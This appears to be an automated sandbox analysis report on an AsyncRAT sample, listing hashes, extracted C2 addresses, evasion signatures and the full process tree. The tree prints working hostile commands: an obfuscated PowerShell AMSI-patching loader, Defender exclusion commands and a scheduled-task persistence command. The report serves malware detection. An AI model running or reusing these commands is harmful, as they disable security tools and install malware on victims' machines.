Analysis

max time kernel: 78s
max time network: 138s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01/11/2022, 10:42

Static task: static1
Behavioral task: behavioral1
Sample: BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Resource: win7-20220812-en
General

Target: BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Size: 584KB
MD5: 8553f9793539d4d17c13e464d606d7dc
SHA1: a033d05b0c0a5b220fde15827b5c716fbec3b398
SHA256: bdd2412c4cb1952748237e6cc32bb3d39a68cb4e1ed3e00db88e74532f1c4d2a
SHA512: 2d672c0a5dfaa1ebd9ee7dbdfec33c8c32bd3b827b03b206ad1bbcb414e2efa65fc8d284ba9c5037800f3c8d69a2a64a864562732951581244722a26401f3aec
SSDEEP: 6144:LHns2eIXWxewKi/i/iHBW0LM7Sx2R1i0t03ugcHg4TU48YMizi:LH4x4KKABW0g2x6/t2S/UfYM4
Malware Config

Extracted: asyncrat
Ratatouille 0.1.0
Youtube
179.43.187.19:33
179.43.187.19:2525
179.43.187.19:4523
179.43.187.19:5555
sdhgamkfgae4-youtube
delay: 3
install: true
install_file: $77-update.exe
install_folder: %AppData%
Signatures

Async RAT payload (1 IoC)
resource | yara_rule
behavioral2/memory/3084-139-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat

Looks for VirtualBox Guest Additions in registry (2 TTPs, 2 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | $77-update.exe

Executes dropped EXE (2 IoCs)
pid | Process
4836 | $77-update.exe
456 | $77-update.exe

Looks for VMWare Tools registry key (2 TTPs, 2 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | $77-update.exe

Checks BIOS information in registry (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | $77-update.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | $77-update.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | $77-update.exe

Maps connected drives based on registry (3 TTPs, 4 IoCs)
Disk information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | $77-update.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | $77-update.exe

Suspicious use of SetThreadContext (2 IoCs)
description | pid | Process | procid_target
PID 3172 set thread context of 3084 | 3172 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 88
PID 4836 set thread context of 456 | 4836 | $77-update.exe | 96

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4120 | schtasks.exe

Delays execution with timeout.exe (1 IoC)
pid | Process
4900 | timeout.exe
Suspicious behavior: EnumeratesProcesses (28 IoCs; identical rows collapsed, with event counts)
pid | Process | events
3084 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 23
4828 | powershell.exe | 2
1984 | powershell.exe | 2
2236 | powershell.exe | 1

Suspicious use of AdjustPrivilegeToken (6 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3084 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Token: SeDebugPrivilege | 456 | $77-update.exe
Token: SeDebugPrivilege | 456 | $77-update.exe
Token: SeDebugPrivilege | 4828 | powershell.exe
Token: SeDebugPrivilege | 1984 | powershell.exe
Token: SeDebugPrivilege | 2236 | powershell.exe

Suspicious use of WriteProcessMemory (43 IoCs; identical rows collapsed, with event counts)
description | pid | Process | procid_target | events
PID 3172 wrote to memory of 3084 | 3172 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 88 | 8
PID 3084 wrote to memory of 3984 | 3084 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 89 | 3
PID 3084 wrote to memory of 3564 | 3084 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 91 | 3
PID 3984 wrote to memory of 4120 | 3984 | cmd.exe | 93 | 3
PID 3564 wrote to memory of 4900 | 3564 | cmd.exe | 94 | 3
PID 3564 wrote to memory of 4836 | 3564 | cmd.exe | 95 | 3
PID 4836 wrote to memory of 456 | 4836 | $77-update.exe | 96 | 8
PID 456 wrote to memory of 1984 | 456 | $77-update.exe | 97 | 3
PID 456 wrote to memory of 4828 | 456 | $77-update.exe | 99 | 3
PID 456 wrote to memory of 4708 | 456 | $77-update.exe | 102 | 3
PID 4708 wrote to memory of 2236 | 4708 | cmd.exe | 103 | 3
Processes (indented by depth in the process tree)

[depth 1] C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"
  PID: 3172
  - Looks for VirtualBox Guest Additions in registry
  - Looks for VMWare Tools registry key
  - Checks BIOS information in registry
  - Maps connected drives based on registry
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

  [depth 2] C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
    Command line: "{path}"
    PID: 3084
    - Checks computer location settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"' & exit
      PID: 3984
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"'
        PID: 4120
        - Creates scheduled task(s)

    [depth 3] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF830.tmp.bat""
      PID: 3564
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\SysWOW64\timeout.exe
        Command line: timeout 3
        PID: 4900
        - Delays execution with timeout.exe

      [depth 4] C:\Users\Admin\AppData\Roaming\$77-update.exe
        Command line: "C:\Users\Admin\AppData\Roaming\$77-update.exe"
        PID: 4836
        - Looks for VirtualBox Guest Additions in registry
        - Executes dropped EXE
        - Looks for VMWare Tools registry key
        - Checks BIOS information in registry
        - Maps connected drives based on registry
        - Suspicious use of SetThreadContext
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Users\Admin\AppData\Roaming\$77-update.exe
          Command line: "{path}"
          PID: 456
          - Executes dropped EXE
          - Checks computer location settings
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

          [depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force
            PID: 1984
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

          [depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension @('exe','dll') -Force
            PID: 4828
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

          [depth 6] C:\Windows\SysWOW64\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mnrflr.exe"' & exit
            PID: 4708
            - Suspicious use of WriteProcessMemory

            [depth 7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mnrflr.exe"'
              PID: 2236
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

              [depth 8] C:\Users\Admin\AppData\Local\Temp\mnrflr.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\mnrflr.exe"
                PID: 5060

[depth 1] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:tbkqimiyfzUz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IwYtXOtBtQwQqj,[Parameter(Position=1)][Type]$iPMuxlCOEI)$nGObfZbeYad=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$nGObfZbeYad.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$IwYtXOtBtQwQqj).SetImplementationFlags('Runtime,Managed');$nGObfZbeYad.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$iPMuxlCOEI,$IwYtXOtBtQwQqj).SetImplementationFlags('Runtime,Managed');Write-Output $nGObfZbeYad.CreateType();}$MoqKhxaskFoaV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$ERtSQpGpRGsnyV=$MoqKhxaskFoaV.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hdhBAHpWubGdiEZRnlF=tbkqimiyfzUz @([String])([IntPtr]);$AtWIqquCzxHiNYyxENXFfi=tbkqimiyfzUz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nVltDWITgSB=$MoqKhxaskFoaV.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$uYOfgWNwFTlDHf=$ERtSQpGpRGsnyV.Invoke($Null,@([Object]$nVltDWITgSB,[Object]('Load'+'LibraryA')));$MPiTVUgLZLAaebjPa=$ERtSQpGpRGsnyV.Invoke($Null,@([Object]$nVltDWITgSB,[Object]('Vir'+'tual'+'Pro'+'tect')));$bkPXySI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uYOfgWNwFTlDHf,$hdhBAHpWubGdiEZRnlF).Invoke('a'+'m'+'si.dll');$xNlZTUMACQZQgTSch=$ERtSQpGpRGsnyV.Invoke($Null,@([Object]$bkPXySI,[Object]('Ams'+'iSc'+'an'+'Buffer')));$TTdoOZlxkB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MPiTVUgLZLAaebjPa,$AtWIqquCzxHiNYyxENXFfi).Invoke($xNlZTUMACQZQgTSch,[uint32]8,4,[ref]$TTdoOZlxkB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$xNlZTUMACQZQgTSch,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MPiTVUgLZLAaebjPa,$AtWIqquCzxHiNYyxENXFfi).Invoke($xNlZTUMACQZQgTSch,[uint32]8,0x20,[ref]$TTdoOZlxkB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
  PID: 2136

[depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ziNMgoNGoBRl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ddsvCpgnIuaPhx,[Parameter(Position=1)][Type]$owgjmaxBSx)$HBOboKbxVfh=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$HBOboKbxVfh.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$ddsvCpgnIuaPhx).SetImplementationFlags('Runtime,Managed');$HBOboKbxVfh.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$owgjmaxBSx,$ddsvCpgnIuaPhx).SetImplementationFlags('Runtime,Managed');Write-Output $HBOboKbxVfh.CreateType();}$BdGqLOqyvYNue=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$cSuiprfaphkETf=$BdGqLOqyvYNue.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GlWkWpIyEXtmHRCwDXp=ziNMgoNGoBRl @([String])([IntPtr]);$RWxZcAUYOwqiFpKSzzFWtH=ziNMgoNGoBRl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hmeXdfWNtXe=$BdGqLOqyvYNue.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$hkMlyYqJUjEkpz=$cSuiprfaphkETf.Invoke($Null,@([Object]$hmeXdfWNtXe,[Object]('Load'+'LibraryA')));$hPHoMYKRUySYnRwkT=$cSuiprfaphkETf.Invoke($Null,@([Object]$hmeXdfWNtXe,[Object]('Vir'+'tual'+'Pro'+'tect')));$muIcHaz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hkMlyYqJUjEkpz,$GlWkWpIyEXtmHRCwDXp).Invoke('a'+'m'+'si.dll');$PPcbRbsDdDmZjgCcI=$cSuiprfaphkETf.Invoke($Null,@([Object]$muIcHaz,[Object]('Ams'+'iSc'+'an'+'Buffer')));$HRtOUGFNEa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hPHoMYKRUySYnRwkT,$RWxZcAUYOwqiFpKSzzFWtH).Invoke($PPcbRbsDdDmZjgCcI,[uint32]8,4,[ref]$HRtOUGFNEa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PPcbRbsDdDmZjgCcI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hPHoMYKRUySYnRwkT,$RWxZcAUYOwqiFpKSzzFWtH).Invoke($PPcbRbsDdDmZjgCcI,[uint32]8,0x20,[ref]$HRtOUGFNEa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
  PID: 4008

[depth 1] C:\Windows\System32\dllhost.exe
  Command line: C:\Windows\System32\dllhost.exe /Processid:{d596c8ed-b563-4340-950c-862a3a8ebd51}
  PID: 5040
Network
MITRE ATT&CK Enterprise v6
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe.log
  Filesize: 1KB
  MD5: 3aea5c16a0e7b995983bd1771d5ea11d
  SHA1: 5ce845c82ace7946cec271a8bac45572b977419c
  SHA256: 8d7143472e7cf3a40f46c6346251661e10fe3a932321cff14190648ee3d9c02f
  SHA512: 4d0949cc3c0b7bc19b94a7166fb1a528c5833773b4b577f1730c4aab93ec03f3d72714ebf8a103f2a6ab4f97abef2945e78c91d464885fb4f1f9c584d7a1b243